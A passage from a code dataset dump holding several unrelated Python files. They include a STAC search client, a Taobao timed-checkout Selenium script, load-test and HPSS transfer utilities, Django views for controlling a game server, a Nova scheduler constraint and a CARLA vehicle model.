enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n 
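# copy the validated FloatFilter onto the view request's sun_azimuth field\n 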
self.stac_request.view.sun_azimuth.CopyFrom(float_filter)\n\n def set_sun_elevation(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.view.sun_elevation.CopyFrom(float_filter)\n\n def set_cloud_cover(self,\n rel_type: enum.FilterRelationship,\n value: float = None,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"eo\"):\n self.stac_request.eo.CopyFrom(EoRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.eo.cloud_cover.CopyFrom(float_filter)\n\n def set_gsd(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.gsd.CopyFrom(float_filter)\n\n def set_observed(self,\n rel_type: enum.FilterRelationship,\n value: Union[datetime, date] = None,\n start: Union[datetime, date] = None,\n end: Union[datetime, date] = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED,\n tzinfo: timezone = timezone.utc):\n self._stac_data.observed.CopyFrom(utils.pb_timestampfield(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction,\n tzinfo=tzinfo))\n\n def set_created(self,\n rel_type: enum.FilterRelationship,\n value: Union[datetime, date] = None,\n start: Union[datetime, date] = None,\n end: Union[datetime, date] = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED,\n tzinfo: timezone = timezone.utc):\n self._stac_data.created.CopyFrom(utils.pb_timestampfield(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction,\n tzinfo=tzinfo))\n\n def set_updated(self,\n rel_type: enum.FilterRelationship,\n value: Union[datetime, date] = None,\n start: Union[datetime, date] = None,\n end: Union[datetime, date] = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED,\n tzinfo: timezone = timezone.utc):\n self._stac_data.updated.CopyFrom(utils.pb_timestampfield(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction,\n tzinfo=tzinfo))\n\n def _float_filter(self,\n rel_type: enum.FilterRelationship,\n value: float = None,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if value is not None:\n if start is not None or end is not None:\n raise ValueError(\"if value is defined, start and end cannot be used\")\n elif rel_type == enum.FilterRelationship.BETWEEN or rel_type == enum.FilterRelationship.NOT_BETWEEN:\n raise ValueError(\"BETWEEN and NOT_BETWEEN cannot be used with value\")\n else:\n if start is None or end is None:\n raise ValueError(\"if start is defined, end must be defined and vice versa\")\n elif rel_type != enum.FilterRelationship.BETWEEN and rel_type != enum.FilterRelationship.NOT_BETWEEN:\n raise ValueError(\"start + end must be used with BETWEEN or NOT_BETWEEN\")\n if rel_type in utils.UNSUPPORTED_TIME_FILTERS:\n raise ValueError(\"currently not supporting filter 
{}\".format(rel_type.name))\n\n float_filter = FloatFilter(rel_type=rel_type,\n value=value,\n start=start,\n end=end,\n sort_direction=sort_direction)\n return float_filter\n\n\nclass NSLClientEx(NSLClient):\n def __init__(self, nsl_only=False):\n super().__init__(nsl_only=nsl_only)\n self._internal_stac_service = stac_singleton\n\n def update_service_url(self, stac_service_url):\n \"\"\"\n update the stac service address\n :param stac_service_url: localhost:8080, 34.34.34.34:9000, http://demo.nearspacelabs.com, etc\n :return:\n \"\"\"\n super().update_service_url(stac_service_url)\n self._internal_stac_service.update_service_url(stac_service_url=stac_service_url)\n\n def search_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None,\n increment_search: Optional[int] = None) -> Iterator[StacItemWrap]:\n if increment_search is not None and increment_search > 0 and stac_request_wrapped.offset > 0:\n raise ValueError(\"can't use offset and increment_search. offset should be paired with limit, \"\n \"and increment_search should be set to None\")\n\n if increment_search is not None and increment_search > stac_request_wrapped.limit:\n # TODO put a warning here?\n increment_search = None\n\n if increment_search is None or increment_search <= 0:\n for stac_item in list(self.search(stac_request_wrapped.stac_request,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name)):\n if not stac_item.id:\n return\n else:\n yield StacItemWrap(stac_item=stac_item)\n else:\n expected_total = stac_request_wrapped.limit\n total = 0\n stac_request_wrapped.limit = increment_search\n stac_request_wrapped.offset = 0\n items = list(self.search(stac_request_wrapped.stac_request,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name))\n while len(items) > 0:\n for stac_item in items:\n total += 1\n yield StacItemWrap(stac_item=stac_item)\n if total >= expected_total:\n return\n\n stac_request_wrapped.offset += stac_request_wrapped.limit\n items = list(self.search(stac_request_wrapped.stac_request,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name))\n\n def feature_collection_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None,\n increment_search: int = None,\n feature_collection: Dict = None) -> Dict:\n if feature_collection is None:\n feature_collection = {'type': 'FeatureCollection', 'features': []}\n\n items = self.search_ex(stac_request_wrapped,\n timeout=timeout,\n nsl_id=nsl_id,\n profile_name=profile_name,\n increment_search=increment_search)\n for item in items:\n feature_collection['features'].append(item.feature)\n\n return feature_collection\n\n def search_one_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None) -> Optional[StacItemWrap]:\n stac_item = self.search_one(stac_request=stac_request_wrapped.stac_request,\n timeout=timeout, nsl_id=nsl_id, profile_name=profile_name)\n if not stac_item.id:\n return None\n return StacItemWrap(stac_item=stac_item)\n\n def count_ex(self,\n stac_request_wrapped: StacRequestWrap,\n timeout=15,\n nsl_id: str = None,\n profile_name: str = None) -> int:\n return self.count(stac_request=stac_request_wrapped.stac_request,\n timeout=timeout, nsl_id=nsl_id, 
profile_name=profile_name)\n","sub_path":"nsl/stac/experimental.py","file_name":"experimental.py","file_ext":"py","file_size_in_byte":46401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592942754","text":"\"\"\"\nFunction: check out and submit the order at a scheduled time; there is roughly 2s of page-loading time in between\nUse case: flash-buying products whose price changes\n\nAuthor: 王峥\nDate: 2019-10-13\n\"\"\"\nfrom selenium import webdriver\nimport datetime\nimport time\n\ndef login():\n # log in to Taobao by scanning the QR code; the link texts below are kept\n # in Chinese because they must match the text on the Taobao page\n browser.get(\"https://www.taobao.com\")\n time.sleep(3)\n if browser.find_element_by_link_text(\"亲,请登录\"):\n browser.find_element_by_link_text(\"亲,请登录\").click()\n print(\"Please finish scanning the QR code within 15s\")\n time.sleep(15)\n browser.get(\"https://cart.taobao.com/cart.htm\")# go to my shopping cart\n # print the login time\n now = datetime.datetime.now()\n print(\"login success\", now.strftime('%Y-%m-%d %H:%M:%S'))\n time.sleep(3)\n\ndef buytime(times, choose):\n # manual selection\n if choose == 2:\n print(\"Please tick the items you want to buy manually\")\n\n # select all\n if choose == 1:\n while True:\n try:\n if browser.find_element_by_id(\"J_SelectAll1\"):\n browser.find_element_by_id(\"J_SelectAll1\").click()\n break\n except:\n print(\"Cannot find the buy button\")\n\n # when the time comes, check out and place the order\n while True:\n #now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')\n now = datetime.datetime.now()\n if now > times:\n # click the checkout button\n while True:\n try:\n if browser.find_element_by_link_text(\"结 算\"):\n browser.find_element_by_link_text(\"结 算\").click()\n print(f\"Checkout succeeded, about to submit the order\")\n break\n except:\n pass\n # click the submit-order button\n while True:\n try:\n if browser.find_element_by_link_text('提交订单'):\n browser.find_element_by_link_text('提交订单').click()\n now = datetime.datetime.now()\n print(\"buytime\", now.strftime('%Y-%m-%d %H:%M:%S'))\n print(f\"Purchase succeeded, please pay as soon as possible\")\n break\n except:\n print(\"Retrying order submission\")\n\nif __name__ == '__main__':\n # time format: \"2018-09-06 11:20:00.000000\"\n #times = input(\"Enter the purchase time, e.g. (2018-09-06 11:20:00.000000): \")\n times = datetime.datetime(2019,10,15,16,20,00)\n\n browser = webdriver.Chrome()# use Google Chrome\n browser.maximize_window()\n # log in\n login()\n # choose select-all or manual selection\n #choose = int(input(\"Enter 1 to auto-select the whole cart when the time comes, otherwise enter 2: \"))\n choose = 2\n # place the order at the scheduled time\n buytime(times, choose)\n\n","sub_path":"crawler/tb_buy.py","file_name":"tb_buy.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"10008205","text":"from net.grinder.script.Grinder import grinder\nfrom net.grinder.script import Test\nfrom net.grinder.plugin.http import HTTPRequest\nfrom java.lang import System\nfrom java.lang import String\nfrom junit.framework import TestSuite\nfrom junit.framework import TestResult\n\nfrom com.amazon.biw2.webapp.tests import BiwAdpTest\nfrom com.amazon.biw2.webapp.tests import BiwAsinSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwKeywordSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwMediaSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwProductSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwSearchTest\n\n\ndef createTestRunner(script):\n exec(\"x = %s.TestRunner()\" % script)\n return x\n\n\nclass TestRunner:\n def __init__(self):\n tid = grinder.threadID\n self.initialisationTime = System.currentTimeMillis()\n # if tid % 5 == 4:\n # self.testRunner = createTestRunner(scripts[1])\n\n def __call__(self):\n # Turn off automatic reporting for the current worker thread.\n # Having done this, the script can modify or set the statistics\n # before they are sent to the log and the console.\n grinder.statistics.delayReports = 1\n\n tid = grinder.threadID\n\n # Creates a Test Suite.\n if tid % 5 
== 4:\n suite = TestSuite(BiwAdpTest().getClass())\n elif tid % 5 == 3:\n suite = TestSuite(BiwAsinSearchTest().getClass())\n elif tid % 5 == 2:\n suite = TestSuite(BiwKeywordSearchTest().getClass())\n elif tid % 5 == 1:\n suite = TestSuite(BiwMediaSearchTest().getClass())\n else:\n suite = TestSuite(BiwProductSearchTest().getClass())\n\n # Returns the tests as an enumeration.\n tests = suite.tests()\n\n # Iterate over the tests.\n testNumber = 0\n for test in tests:\n testNumber += 1\n testCase = Test(testNumber, test.getName()).wrap(suite)\n\n testResult = TestResult()\n testCase.runTest(test, testResult)\n\n if testResult.errorCount() > 0:\n grinder.statistics.success = 0\n elif testResult.failureCount() > 0:\n grinder.statistics.success = 0\n\n def __del__(self):\n elapsed = System.currentTimeMillis() - self.initialisationTime\n","sub_path":"scripts/biw_search.py","file_name":"biw_search.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"211886463","text":"# simple function\ndef calcula():\n    calculo = 43 * 12 * 80\n    calculo = calculo / 7\n    coeficiente = 45 * 3.1416\n    calculo = calculo * coeficiente\n    calculo = \"The result is -> \" + str(calculo)\n    print(calculo)\n\n# function that receives parameters\ndef calcula_valor(mensaje, numero1, numero2):\n    resultado = numero1 + numero2\n    print(mensaje + str(resultado))\n\n\n# function that receives parameters and returns a value\ndef calcula_valor_2(numero1, numero2, comando):\n    if comando==\"-\":\n        resultado = numero1 - numero2\n    if comando==\"+\":\n        resultado = numero1 + numero2\n\n    return resultado\n\nres1 = calcula_valor_2(10,100,\"+\")\n\nprint(res1)\n\n\n\n\n\n\n\n\n","sub_path":"1 python_desde_0/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"395812767","text":"from __future__ import print_function, absolute_import\n\nimport os.path\nimport shlex\nimport subprocess\nfrom .settings import get_db_filename, logger\nfrom .utils import run_command\n\n\ndef hpss_transfer(hpss, file_path, transfer_type, cache, keep=None):\n    if hpss == 'none':\n        logger.info('{}: HPSS is unavailable'.format(transfer_type))\n        if transfer_type == 'put' and file_path != get_db_filename(cache):\n            logger.info('{}: Keeping tar files locally and removing write permissions'.format(\n                transfer_type))\n            # https://unix.stackexchange.com/questions/46915/get-the-chmod-numerical-value-for-a-file\n            display_mode = \"stat --format '%a' {}\".format(file_path).split()\n            output = subprocess.check_output(display_mode).strip()\n            logger.info('{} original mode={}'.format(file_path, output))\n            # https://www.washington.edu/doit/technology-tips-chmod-overview\n            # Remove write-permission from user, group, and others,\n            # without changing read or execute permissions for any.\n            change_mode = 'chmod ugo-w {}'.format(file_path).split()\n            subprocess.check_output(change_mode)\n            output = subprocess.check_output(display_mode).strip()\n            logger.info('{} new mode={}'.format(file_path, output))\n        return\n    if transfer_type == 'put':\n        transfer_word = 'to'\n        transfer_command = 'put'\n    elif transfer_type == 'get':\n        transfer_word = 'from'\n        transfer_command = 'get'\n    else:\n        raise Exception('Invalid transfer_type={}'.format(transfer_type))\n    logger.info('Transferring file {} HPSS: {}'.format(transfer_word, file_path))\n    path, name = os.path.split(file_path)\n\n    # Need to be in local directory 
for hsi put to work\n    cwd = os.getcwd()\n    if path != '':\n        if (transfer_type == 'get') and (not os.path.isdir(path)):\n            os.makedirs(path)\n        os.chdir(path)\n\n    # Transfer file using hsi put\n    command = 'hsi -q \"cd {}; {} {}\"'.format(hpss, transfer_command, name)\n    error_str = 'Transferring file {} HPSS: {}'.format(transfer_word, name)\n    run_command(command, error_str)\n\n    # Back to original working directory\n    if path != '':\n        os.chdir(cwd)\n\n    if transfer_type == 'put':\n        # Remove local file if requested\n        if not keep:\n            os.remove(file_path)\n\n\ndef hpss_put(hpss, file_path, cache, keep=True):\n    \"\"\"\n    Put a file to the HPSS archive.\n    \"\"\"\n    hpss_transfer(hpss, file_path, 'put', cache, keep)\n\n\ndef hpss_get(hpss, file_path, cache):\n    \"\"\"\n    Get a file from the HPSS archive.\n    \"\"\"\n    hpss_transfer(hpss, file_path, 'get', cache, False)\n\n\ndef hpss_chgrp(hpss, group, recurse=False):\n    \"\"\"\n    Change the group of the HPSS archive.\n    \"\"\"\n    if hpss == 'none':\n        logger.info('chgrp: HPSS is unavailable')\n        return\n    if recurse:\n        recurse_str = '-R '\n    else:\n        recurse_str = ''\n    command = 'hsi chgrp {}{} {}'.format(recurse_str, group, hpss)\n    error_str = 'Changing group of HPSS archive {} to {}'.format(hpss, group)\n    run_command(command, error_str)\n","sub_path":"zstash/hpss.py","file_name":"hpss.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"226754850","text":"import csv\nimport re\n\n# Open specified csv file and read data from file.\n# Warning: when files are updated and their names get changed, you\n# must update the hard coded file name in DataBuilder.py\ndef dict_builder(path=\"\"):\n    location = path\n    data_dictionary = dict()\n\n    with open(path, \"r\") as fin:\n        reader = csv.DictReader(fin)\n\n        for frow in reader:\n            tempdict = dict()\n            for cn, values in frow.items():\n                if values != \"\":\n                    tempdict[cn] = values\n            row_id = frow[[*frow.keys()][0]]\n            if re.match(r\".*Root Table.*\", location, re.IGNORECASE):\n                data_dictionary[row_id] = tempdict\n            else:\n                data_dictionary[row_id.lower()] = tempdict\n\n    return data_dictionary","sub_path":"DataHelper.py","file_name":"DataHelper.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"509753002","text":"# -*- coding: utf-8 -*-\r\nfrom UsrError import UsrError\r\n\r\nclass FeldBuilder:\r\n    \"\"\"\r\n    Builds the playing field from the information in the\r\n    input file. 
The content of the input file was not checked\r\n    beforehand, which is why that also happens here.\r\n    \"\"\"\r\n    def getFeld(self, filename):\r\n        try:\r\n            # open the file (\"r\" as the parameter, to read only)\r\n            Field = []\r\n            f = open(filename, \"r\") \r\n        except:\r\n            raise UsrError(\"Error opening file %s\" % (filename,))\r\n\r\n        # on success\r\n        else:\r\n            file = []\r\n            # Write all lines from the file into the collection 'file'.\r\n            for line in f:\r\n                file.append(line)\r\n\r\n            # The field definition is initialized with an empty string.\r\n            FieldDef = \"\"\r\n            for line in file:\r\n                \r\n                # The first line in the file that does not start with \"#\"\r\n                # should contain the field definition.\r\n                if not line.startswith(\"#\"):\r\n                    FieldDef = line\r\n                    \r\n                    # subsequent lines are ignored\r\n                    break\r\n\r\n            # If there was no line starting with \"#\", or there was a blank\r\n            # line between the comments and the definition, error handling\r\n            # with a corresponding message is triggered.\r\n            if FieldDef == \"\":\r\n                raise UsrError(\"No starting distribution given for the rows\")\r\n\r\n            # If there was a non-empty line, try to find the numbers in it\r\n            # that reflect the starting conditions of the playing field.\r\n            for i in range(len(FieldDef)):\r\n                \r\n                # every odd position should hold a value.\r\n                if i % 2 == 0: # the odd positions (indexing starts at 0)\r\n                    try:\r\n                        # try to convert the character into a number\r\n                        Field.append(int(FieldDef[i]))\r\n                    except:\r\n                        raise UsrError(\"Input error in file %s in line '%s' \\n\" % (filename, FieldDef,) +\r\n                                       \"%s is not an integer\" % (FieldDef[i],)\r\n                                       )\r\n                    # if a zero is given, the starting condition is invalid\r\n                    if FieldDef[i] == \"0\":\r\n                        raise UsrError(\"Starting rows with the value '0' must not be passed!\")\r\n\r\n                # even-numbered characters in the string should be spaces.\r\n                if i % 2 == 1: # the even positions\r\n                    if FieldDef[i] != \" \":\r\n                        raise UsrError(\"Input error in file %s in line '%s'\" % (filename, FieldDef,))\r\n            \r\n            # if more than 9 rows were created, the field definition is likewise\r\n            # invalid according to the assignment\r\n            if len(Field) > 9:\r\n                raise UsrError(\"Too many rows were given. 
A maximum of 9 rows is allowed\")\r\n            \r\n            else:\r\n                # if there were no errors, return the constructed field\r\n                return Field\r\n","sub_path":"Quellcode/FeldBuilder.py","file_name":"FeldBuilder.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282708278","text":"from django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext, loader, Context\nfrom django.http import HttpResponse\nfrom django.core.context_processors import csrf\nfrom controller import connect\nimport re\nfrom math import floor\n\n\nclass Server:\n    def __init__(self, players=None):\n        self.players = players\n\n\nclass Player:\n    def __init__(self):\n        self.userid = None\n        self.username = None\n        self.steamid = None\n        self.timeconnected = None\n        self.ping = 0\n        self.loss = 0\n        self.state = None\n        self.ip = None\n\n\ndef get_players(players):\n\n    player_list = []\n    bot_list = []\n\n    for i in players:\n        # the named groups below are reconstructed from the s.group(...) calls\n        # further down; the '<...>' names were lost in extraction\n        s = re.search('#[ ]+' +\n                      '(?P<userid>[^ ]+)[ ]+' +\n                      '\"(?P<name>.+)\"[ ]+' +\n                      '(?P<uniqueid>[^ ]+)[ ]+' +\n                      '(?P<connected>[^ ]+)[ ]+' +\n                      '(?P<ping>[^ ]+)[ ]+' +\n                      '(?P<loss>[^ ]+)[ ]+' +\n                      '(?P<state>[^ ]+)[ ]+' +\n                      '(?P<ip>[^ ]+)[ ]*',\n                      i)\n        if not s:\n            # bot rows have fewer columns; the 'uniqueid' name here is an\n            # assumption (bots report 'BOT' in that column)\n            s = re.search('#[ ]+' +\n                          '(?P<userid>[^ ]+)[ ]+' +\n                          '\"(?P<name>.+)\"[ ]+' +\n                          '(?P<uniqueid>[^ ]+)[ ]+' +\n                          '(?P<state>[^ ]+)',\n                          i)\n            if s:\n                b = Player()\n                b.userid = s.group('userid')\n                b.name = s.group('name')\n                b.state = s.group('state')\n                bot_list += [b]\n            continue\n\n        p = Player()\n        p.userid = s.group('userid')\n        p.username = s.group('name')\n        p.steamid = s.group('uniqueid')\n        p.timeconnected = s.group('connected')\n        p.ping = s.group('ping')\n        p.loss = s.group('loss')\n        p.state = s.group('state')\n        p.ip = s.group('ip')\n        player_list += [p]\n\n    return (player_list, bot_list)\n\n\ndef server_status(s):\n    server = Server()\n\n    lines = connect.command(s, 'status')\n    status, player_list = lines.split('# userid', 1)\n    server.hostname = re.search('hostname: +(.*)', status).group(1)\n    server.version = re.search('version *: +(.*)', status).group(1)\n    server.ip_address = re.search('public ip *: +(.*)\\)', status).group(1)\n    server.current_map = re.search('map *: +(.*) at', status).group(1)\n    server.replay = re.search('replay *: +recording', status)\n    players = re.search('players *: +(.*) \\((.*) max\\)', status)\n    server.current_players = int(players.group(1))\n    server.max_players = int(players.group(2))\n\n    server.password = connect.get_variable('sv_password', s)\n\n    server.maps = []\n    map_names = connect.command(s, 'maps *').split('\\n')\n    for i in map_names:\n        search = re.search('\\(fs\\) (.*)\\.bsp', i)\n        if search:\n            server.maps += [search.group(1)]\n\n    player_list = player_list.split('\\n')\n\n    server.players, server.bots = get_players(player_list[1:])\n\n    server.humans = server.current_players - len(server.bots)\n\n    line = connect.command(s, 'stats').split('\\n')[1]\n    # group names reconstructed from the usage below; 'Players' (unused) is an\n    # assumed name for the seventh column of the srcds 'stats' output\n    search = re.search(' *' +\n                       '(?P<CPU>[^ ]+) *' +\n                       '(?P<NetIn>[^ ]+) *' +\n                       '(?P<NetOut>[^ ]+) *' +\n                       '(?P<Uptime>[^ ]+) *' +\n                       '(?P<MapChanges>[^ ]+) *' +\n                       '(?P<FPS>[^ ]+) *' +\n                       '(?P<Players>[^ ]+) *' +\n                       '(?P<Connects>[^ ]+)', line)\n\n    server.cpu_usage = search.group('CPU')\n    server.net_in = search.group('NetIn')\n    server.net_out = search.group('NetOut')\n    server.uptime = int(search.group('Uptime'))\n    server.uptime_h = floor(server.uptime / 60.0)\n    server.uptime -= server.uptime_h * 60\n    server.uptime_d = int(floor(server.uptime_h / 24.0))\n    server.uptime_h -= server.uptime_d * 24\n    server.uptime_h = int(server.uptime_h)\n    server.uptime = int(server.uptime)\n    server.map_changes = search.group('MapChanges')\n    
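# the remaining counters come from the same (assumed) srcds 'stats' row parsed above\n    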
server.fps = search.group('FPS')\n server.connects = search.group('Connects')\n\n return server\n\n\ndef changemap(request):\n if not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n\n connect.command(s, 'changelevel {0}'.format(request.POST.get('map_choice')))\n\n return redirect('home.views.index')\n\ndef setcash(request, ID='@all'):\n cash = request.POST.get('cash')\n if int(cash) < 100:\n cash = \"100\"\n elif int(cash) > 30000:\n cash = \"30000\"\n s = connect.getConnection()\n connect.command(s, 'sm_setcash \"{0}\" {1}'.format(ID, cash))\n\n return redirect('home.views.index')\n\ndef forceready(request):\n s = connect.getConnection()\n connect.command(s, 'sm_ready @all 1')\n\n return redirect('home.views.index')\n\ndef restart(request):\n if not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n connect.command(s, 'exit')\n\n return redirect('home.views.index')\n\n\ndef password_toggle(request, enable=False):\n if not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n\n password = '\"\"'\n if int(enable):\n password = '\"shadow\"'\n\n cmd = 'sv_password {0}'.format(password)\n connect.command(s, cmd)\n return redirect('home.views.index')\n\n\ndef kickbyid(request, ID=None, Reason='Slot Reservation'):\n protected = []\n if ID in protected or not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n connect.command(s, 'kickid {0} {1}'.format(ID, Reason))\n\n return redirect('home.views.index')\n\n\ndef serverinfo(request):\n try:\n s = connect.getConnection()\n response = server_status(s)\n except connect.socket.timeout:\n response = None\n\n user = request.user\n\n t = loader.get_template('server.json')\n c = Context({\n 'server': response,\n 'auth': user.is_authenticated()})\n\n c.update(csrf(request))\n\n rendered = ' '.join(t.render(c).replace('\\\\\\n', '').split())\n return HttpResponse(rendered, content_type='application/json')\n\n\n # return render_to_response('server.html', )\n\n\ndef index(request):\n try:\n s = connect.getConnection()\n response = server_status(s)\n except connect.socket.timeout:\n response = None\n except connect.socket.error:\n response = None\n\n user = request.user\n return render_to_response('index.html', {\n 'server': response,\n 'auth': user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n\ndef wavebuilder(request):\n return render_to_response('wavebuilder.html', {\n 'auth': request.user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n\ndef statistics(request):\n return render_to_response('statistics.html', {\n 'auth': request.user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n\ndef config(request):\n return render_to_response('config.html', {\n 'auth': request.user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n","sub_path":"site/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"374405720","text":"# Copyright (c) 2014 Cisco Systems Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo.config import cfg\n\nfrom nova.compute import api as compute\nfrom nova import db\nfrom nova.openstack.common import log as logging\nfrom nova.scheduler.solvers import linearconstraints\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\nCONF.import_opt('default_availability_zone', 'nova.availability_zones')\n\n\nclass AvailabilityZoneConstraint(linearconstraints.BaseLinearConstraint):\n \"\"\"To select only the hosts belonging to an availability zone.\n \"\"\"\n\n def __init__(self, variables, hosts, instance_uuids, request_spec,\n filter_properties):\n self.compute_api = compute.API()\n [self.num_hosts, self.num_instances] = self._get_host_instance_nums(\n hosts, instance_uuids, request_spec)\n\n def _get_host_instance_nums(self, hosts, instance_uuids, request_spec):\n \"\"\"This method calculates number of hosts and instances.\"\"\"\n num_hosts = len(hosts)\n if instance_uuids:\n num_instances = len(instance_uuids)\n else:\n num_instances = request_spec.get('num_instances', 1)\n return [num_hosts, num_instances]\n\n # The linear constraint should be formed as:\n # coeff_matrix * var_matrix' (operator) constant_vector\n # where (operator) is ==, >, >=, <, <=, !=, etc.\n # For convenience, the constant_vector is merged into left-hand-side,\n # thus the right-hand-side is always 0.\n\n def get_coefficient_vectors(self, variables, hosts, instance_uuids,\n request_spec, filter_properties):\n # Coefficients are 0 for hosts in the availability zone, 1 for others\n props = request_spec.get('instance_properties', {})\n availability_zone = props.get('availability_zone')\n\n coefficient_vectors = []\n for host in hosts:\n if availability_zone:\n context = filter_properties['context'].elevated()\n metadata = db.aggregate_metadata_get_by_host(context,\n host.host, key='availability_zone')\n if 'availability_zone' in metadata:\n if availability_zone in metadata['availability_zone']:\n coefficient_vectors.append([0 for j in range(\n self.num_instances)])\n else:\n coefficient_vectors.append([1 for j in range(\n self.num_instances)])\n elif availability_zone == CONF.default_availability_zone:\n coefficient_vectors.append([0 for j in range(\n self.num_instances)])\n else:\n coefficient_vectors.append([1 for j in range(\n self.num_instances)])\n else:\n coefficient_vectors.append([0 for j in range(\n self.num_instances)])\n return coefficient_vectors\n\n def get_variable_vectors(self, variables, hosts, instance_uuids,\n request_spec, filter_properties):\n # The variable_vectors[i,j] denotes the relationship between\n # host[i] and instance[j].\n variable_vectors = [[variables[i][j] for j in range(\n self.num_instances)] for i in range(self.num_hosts)]\n return variable_vectors\n\n def get_operations(self, variables, hosts, instance_uuids, request_spec,\n filter_properties):\n # Operations are '=='.\n operations = [(lambda x: x == 0) for i in range(self.num_hosts)]\n return 
 operations\n","sub_path":"nova/scheduler/solvers/linearconstraints/availability_zone_constraint.py","file_name":"availability_zone_constraint.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95491559","text":"from base_car import Base_Car\nfrom globe_var import Globe_Var\n\nfrom sensor_manage import CollisionSensor\nfrom sensor_manage import IMUSensor\nfrom sensor_manage import LaneInvasionSensor\nfrom sensor_manage import RadarSensor\nfrom sensor_manage import GnssSensor\n\n\nclass Intelligent_Car(Base_Car):\n    def __init__(self, vehicle):\n        super().__init__(vehicle)\n        self.vehicle = vehicle\n        self.target_acc = 0\n\n        # the various sensors\n        self.collision_sensor = None\n        self.lane_invasion_sensor = None\n        self.gnss_sensor = None\n        self.imu_sensor = None\n        self.radar_sensor = None\n        self.append_sensors()\n\n        self.lane_change_type = None  # controls the lane-change direction\n\n    def append_sensors(self):\n        '''Attach the sensors.'''\n        self.collision_sensor = CollisionSensor(self.vehicle)\n        self.lane_invasion_sensor = LaneInvasionSensor(self.vehicle)\n        self.gnss_sensor = GnssSensor(self.vehicle)\n        self.imu_sensor = IMUSensor(self.vehicle)\n\n    def overall_model(self):\n        '''The single entry point that controls how the vehicle drives.'''\n        waypoint = self.get_waypoint()\n        lane_id,road_id = waypoint.lane_id,waypoint.road_id\n        front_car = self.get_forward_car(road_id,lane_id,self.get_distance_to_road_end())\n\n        self.target_acc = self.idm_follow_model(self.get_distance_to_other_car(front_car),self,front_car)\n        self.acc_control()\n\n    def idm_follow_model(self, distance, back_car, front_car):\n        '''IDM car-following model: gap distance, following car, leading car.'''\n        if front_car is None:\n            return 0\n\n        front_car_length = front_car.length\n        # speed of the following car\n        vb = back_car.get_speed()\n        # 